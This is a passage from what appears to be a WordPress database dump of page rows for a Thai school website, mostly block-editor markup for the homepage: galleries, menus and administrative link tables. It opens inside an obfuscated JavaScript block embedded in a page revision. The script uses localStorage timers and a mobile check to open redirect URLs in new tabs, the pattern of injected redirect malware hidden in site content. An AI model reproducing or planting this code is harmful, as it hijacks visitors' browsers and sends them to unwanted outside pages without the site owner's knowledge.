_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:51:40','2024-08-07 14:51:40','',14,'http://pakhaeng.ssk.in.th/?p=675',0,'revision','',0),
(677,1,'2024-08-07 22:06:24','2024-08-07 15:06:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 